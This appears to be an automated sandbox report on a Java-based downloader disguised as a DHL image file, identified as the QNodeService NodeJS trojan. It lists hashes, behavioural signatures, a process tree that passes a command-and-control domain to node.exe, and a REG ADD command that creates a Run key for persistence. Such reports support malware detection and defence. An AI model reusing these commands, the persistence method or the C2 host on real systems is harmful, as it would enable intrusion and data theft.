Analysis
-
max time kernel
34s -
max time network
127s -
platform
windows10_x64 -
resource
win10v20201028 -
submitted
10-11-2020 12:16
Static task
static1
Behavioral task
behavioral1
Sample
DHL_Nov 2020 at 1.60_8BZ290_JPG.jar
Resource
win7v20201028
Behavioral task
behavioral2
Sample
DHL_Nov 2020 at 1.60_8BZ290_JPG.jar
Resource
win10v20201028
General
-
Target
DHL_Nov 2020 at 1.60_8BZ290_JPG.jar
-
Size
102KB
-
MD5
f510cc2e6db0132ffad3d5f2345513f1
-
SHA1
9c0aee278531f417a5d13751540d67bd6ea8cc37
-
SHA256
0039ce5cc4dc578a2b74c653f0b3f4cf23accb66c515be8a14679dab557aa311
-
SHA512
130ebf7b024d7fc78f850b63086db83154fba48cc5a973e943e78bcb1d8506bcd1ab7395dbb84372c5a04cac4472c0132839286505a107f02f83489e0b10c654
Malware Config
Signatures
-
QNodeService
Trojan/stealer written in NodeJS and spread via Java downloader.
-
Executes dropped EXE 3 IoCs
pid Process 208 node.exe 1888 node.exe 3668 node.exe -
Adds Run key to start application 2 TTPs 2 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\Microsoft\Windows\CurrentVersion\Run\c3cffcfc-7ee0-409b-9ccc-1aa2f785a75e = "cmd /D /C \"C:\\Users\\Admin\\qhub\\node\\2.0.10\\boot.vbs\"" reg.exe -
JavaScript code in executable 3 IoCs
resource yara_rule behavioral2/files/0x000100000001ab9a-175.dat js behavioral2/files/0x000100000001ab9a-180.dat js behavioral2/files/0x000100000001ab9a-184.dat js -
Looks up external IP address via web service 2 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 21 wtfismyip.com 22 wtfismyip.com -
Checks processor information in registry 2 TTPs 6 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 node.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz node.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString node.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1 node.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\~MHz node.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\ProcessorNameString node.exe -
Suspicious behavior: EnumeratesProcesses 18 IoCs
pid Process 208 node.exe 208 node.exe 208 node.exe 208 node.exe 1888 node.exe 1888 node.exe 1888 node.exe 1888 node.exe 3668 node.exe 3668 node.exe 3668 node.exe 3668 node.exe 3668 node.exe 3668 node.exe 3668 node.exe 3668 node.exe 3668 node.exe 3668 node.exe -
Suspicious use of WriteProcessMemory 12 IoCs
description pid Process procid_target PID 1036 wrote to memory of 1172 1036 java.exe 77 PID 1036 wrote to memory of 1172 1036 java.exe 77 PID 1172 wrote to memory of 208 1172 javaw.exe 81 PID 1172 wrote to memory of 208 1172 javaw.exe 81 PID 208 wrote to memory of 1888 208 node.exe 83 PID 208 wrote to memory of 1888 208 node.exe 83 PID 1888 wrote to memory of 3668 1888 node.exe 84 PID 1888 wrote to memory of 3668 1888 node.exe 84 PID 3668 wrote to memory of 1012 3668 node.exe 86 PID 3668 wrote to memory of 1012 3668 node.exe 86 PID 1012 wrote to memory of 3728 1012 cmd.exe 87 PID 1012 wrote to memory of 3728 1012 cmd.exe 87
Processes
-
C:\ProgramData\Oracle\Java\javapath\java.exejava -jar "C:\Users\Admin\AppData\Local\Temp\DHL_Nov 2020 at 1.60_8BZ290_JPG.jar"1⤵
- Suspicious use of WriteProcessMemory
PID:1036 -
C:\Program Files\Java\jre1.8.0_66\bin\javaw.exe"C:\Program Files\Java\jre1.8.0_66\bin\javaw.exe" -jar C:\Users\Admin\AppData\Local\Temp\399e7562.tmp2⤵
- Suspicious use of WriteProcessMemory
PID:1172 -
C:\Users\Admin\node-v14.12.0-win-x64\node.exeC:\Users\Admin\node-v14.12.0-win-x64\node.exe - --hub-domain ntums330.hopto.org3⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:208 -
C:\Users\Admin\node-v14.12.0-win-x64\node.exeC:\Users\Admin\node-v14.12.0-win-x64\node.exe C:\Users\Admin\AppData\Local\Temp\_qhub_node_1MlvYQ\boot.js --hub-domain ntums330.hopto.org4⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:1888 -
C:\Users\Admin\node-v14.12.0-win-x64\node.exeC:\Users\Admin\node-v14.12.0-win-x64\node.exe C:\Users\Admin\AppData\Local\Temp\_qhub_node_1MlvYQ\boot.js --hub-domain ntums330.hopto.org5⤵
- Executes dropped EXE
- Checks processor information in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:3668 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "c3cffcfc-7ee0-409b-9ccc-1aa2f785a75e" /t REG_SZ /F /D "cmd /D /C \"C:\Users\Admin\qhub\node\2.0.10\boot.vbs\"""6⤵
- Suspicious use of WriteProcessMemory
PID:1012 -
C:\Windows\system32\reg.exeREG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "c3cffcfc-7ee0-409b-9ccc-1aa2f785a75e" /t REG_SZ /F /D "cmd /D /C \"C:\Users\Admin\qhub\node\2.0.10\boot.vbs\""7⤵
- Adds Run key to start application
PID:3728
-
-
-
-
-
-